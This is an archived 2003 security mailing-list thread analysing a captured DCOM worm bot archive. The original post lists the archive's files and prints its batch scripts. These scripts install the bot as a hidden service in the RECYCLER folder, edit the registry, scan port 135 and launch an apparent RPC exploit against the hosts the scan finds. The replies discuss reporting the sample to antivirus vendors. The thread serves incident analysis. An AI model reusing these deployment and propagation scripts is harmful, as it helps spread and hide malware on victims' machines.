RE: DCOM bot.rar
From: Dowling, Gabrielle (dowlingg_at_sullcrom.com)
Date: 08/20/03
- Previous message: Eric Nelson: "Re: possible 0-day exploit for latest Real-/Helixserver 9.0.2.794"
- Maybe in reply to: Andrej: "DCOM bot.rar"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Wed, 20 Aug 2003 01:15:01 -0400 To: "Schmehl, Paul L" <pauls@utdallas.edu>, <laj@swordlord.com>, <incidents@securityfocus.com>
Has anyone submitted this to an av vendor? The lucomupdate.dll on its face is troubling, as it correlates to lucomupdate.exe, which is sav's autoupdater. I have not checked any of the other files listed....
G
-----Original Message-----
From: Schmehl, Paul L
Sent: Wed Aug 20 00:10:47 2003
To: laj@swordlord.com; incidents@securityfocus.com
Subject: RE: DCOM bot.rar
Typical warez site stuff. Looks like the warez kiddies are using the
worms to create new file repositories. Did you run strings on any of
the files?
Paul Schmehl (pauls@utdallas.edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/
> -----Original Message-----
> From: Andrej [mailto:laj@swordlord.com]
> Sent: Tuesday, August 19, 2003 4:22 AM
> To: incidents@securityfocus.com
> Subject: DCOM bot.rar
>
>
> I was finally able to get bot.rar...
> Here is the archive list:
> Archive bot.rar
>
> Name Size Packed Ratio Date Time Attr
> CRC Meth
> Ver
>
> --------------------------------------------------------------
> --------------
> ---
> winole.exe 572928 566724 98% 22-07-03 18:47 .....A
> 6E1BA67C m3e
> 2.9
> wmpx.exe 43383 35139 80% 07-08-03 02:01 .....A
> 0A73E7CB m3e
> 2.9
> wx11.bat 109 109 100% 06-08-03 18:29 .....A
> BA641709 m0e
> 2.9
> wx12.bat 194 166 85% 07-08-03 03:28 .....A
> 66A7E567 m3e
> 2.9
> wx12.exe 19618 10055 51% 06-08-03 20:55 .....A
> 273D03A0 m3e
> 2.9
> logs 0 0 0% 07-08-03 14:22 .D....
> 00000000 m0
> 2.0
> unrar.bat 169 137 81% 06-08-03 18:22 .....A
> 4E276E39 m3e
> 2.9
> UnRAR.exe 194048 87237 44% 16-06-03 18:32 ......
> B638F78C m3e
> 2.9
> bnc.cfg 76 75 98% 27-07-03 16:48 .....A
> 03CDF0A3 m3e
> 2.9
> Clear.exe 28672 11962 41% 16-06-03 18:32 .....A
> FBA086F4 m3e
> 2.9
> click.exe 32768 6149 18% 16-06-03 18:32 .....A
> EA3874C5 m3e
> 2.9
> CRC.EXE 24096 8231 34% 16-06-03 21:41 .....A
> D2158CA5 m3e
> 2.9
> cygwin1.dll 971080 375803 38% 17-06-03 03:06 .....A
> 7337F48A m3e
> 2.9
> deploy.bat 274 185 67% 06-08-03 18:20 .....A
> A3DA5EC6 m3e
> 2.9
> dhcpp.exe 69632 28908 41% 16-06-03 18:32 .....A
> 2CA5E915 m3e
> 2.9
> drvx.dll 2853 1215 42% 06-08-03 21:03 .....A
> 5956B0F0 m3e
> 2.9
> events.exe 134656 37316 27% 22-07-03 17:58 .....A
> 0EF30C5D m3e
> 2.9
> jesus.dll 4254 1275 29% 07-08-03 01:21 .....A
> BFF39F13 m3e
> 2.9
> LucomServer.dll 802 484 60% 06-08-03 18:00
> .....A 4C649F72
> m3e 2.9
> msoft.dll 206 128 62% 24-07-03 00:13 .....A
> 8DF17003 m3e
> 2.9
> nctl.exe 569344 542111 95% 26-07-03 21:12 .....A
> F0C7F7AA m3e
> 2.9
> pslist.exe 49152 21746 44% 16-06-03 21:41 .....A
> ED211211 m3e
> 2.9
> Q019204.EXE 21584 10136 46% 16-06-03 21:41 .....A
> 212BBC50 m3e
> 2.9
> reg.reg 773 432 55% 04-08-03 14:23 .....A
> 6FE50066 m3e
> 2.9
> service.exe 63488 26461 41% 01-07-03 10:40 .....A
> 78DBBEF8 m3e
> 2.9
> service.txt 176 129 73% 06-08-03 18:02 .....A
> E63DBB36 m3e
> 2.9
> SFind.exe 266752 263546 98% 07-08-03 02:04 .....A
> 76BB24D4 m3e
> 2.9
> start.dll 6153 1745 28% 07-08-03 14:22 .....A
> 303AF0E8 m3e
> 2.9
> users.dll 75017 23205 30% 07-08-03 01:22 .....A
> EE2F60B1 m3e
> 2.9
>
> --------------------------------------------------------------
> --------------
> ---
> 29 3152257 2060809 65%
>
>
> the .bat files are below:
> ::::::::::::::
> deploy.bat
> ::::::::::::::
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004
> mkdir "logs"
> copy bot.rar
> c:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\LOGS\
> net stop WinOLE
> service.exe -r WinOLE
> service.exe service.txt
> %SYSTEMROOT%\regedit.exe -S reg.reg
> net start WinOLE
> exit
> ::::::::::::::
> unrar.bat
> ::::::::::::::
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
>
> attrib -r bot.rar
> attrib -r unrar.exe
> attrib -r unrar.bat
>
> unrar.exe x bot.rar
> start deploy.bat
> EXIT
> ::::::::::::::
> wx11.bat
> ::::::::::::::
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
> ECHO. > RPC.dll
> sfind -p 135 %1 %2
> del RPC.dll
> ::::::::::::::
> wx12.bat
> ::::::::::::::
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
> ECHO. > rpcf.dll
> ping -n 1 %2 | find "Reply"
> if errorlevel 1 goto end
> wx12.exe 1 %2 %1
> wx12.exe 0 %2 %1
> :end
> del rpcf.dll
> exit
>
>
> --------------------------------------------------------------
> -------------
> Captus Networks - Integrated Intrusion Prevention and Traffic
> Shaping
> - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
> - Automatically Control P2P, IM and Spam Traffic
> - Ensure Reliable Performance of Mission Critical Applications
> - Precisely Define and Implement Network Security and
> Performance Policies **FREE Vulnerability Assessment Toolkit
> - WhitePapers - Live Demo Visit us at:
> http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
> --------------------------------------------------------------
> --------------
>
>
---------------------------------------------------------------------------
Captus Networks - Integrated Intrusion Prevention and Traffic Shaping
- Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
- Automatically Control P2P, IM and Spam Traffic
- Ensure Reliable Performance of Mission Critical Applications
- Precisely Define and Implement Network Security and Performance Policies
**FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo
Visit us at:
http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
----------------------------------------------------------------------------
**********************************************************************
This e-mail is sent by a law firm and contains information
that may be privileged and confidential. If you are not the
intended recipient, please delete the e-mail and notify us
immediately.
***********************************************************************
---------------------------------------------------------------------------
Captus Networks - Integrated Intrusion Prevention and Traffic Shaping
- Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
- Automatically Control P2P, IM and Spam Traffic
- Ensure Reliable Performance of Mission Critical Applications
- Precisely Define and Implement Network Security and Performance Policies
**FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo
Visit us at:
http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
----------------------------------------------------------------------------
- Previous message: Eric Nelson: "Re: possible 0-day exploit for latest Real-/Helixserver 9.0.2.794"
- Maybe in reply to: Andrej: "DCOM bot.rar"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
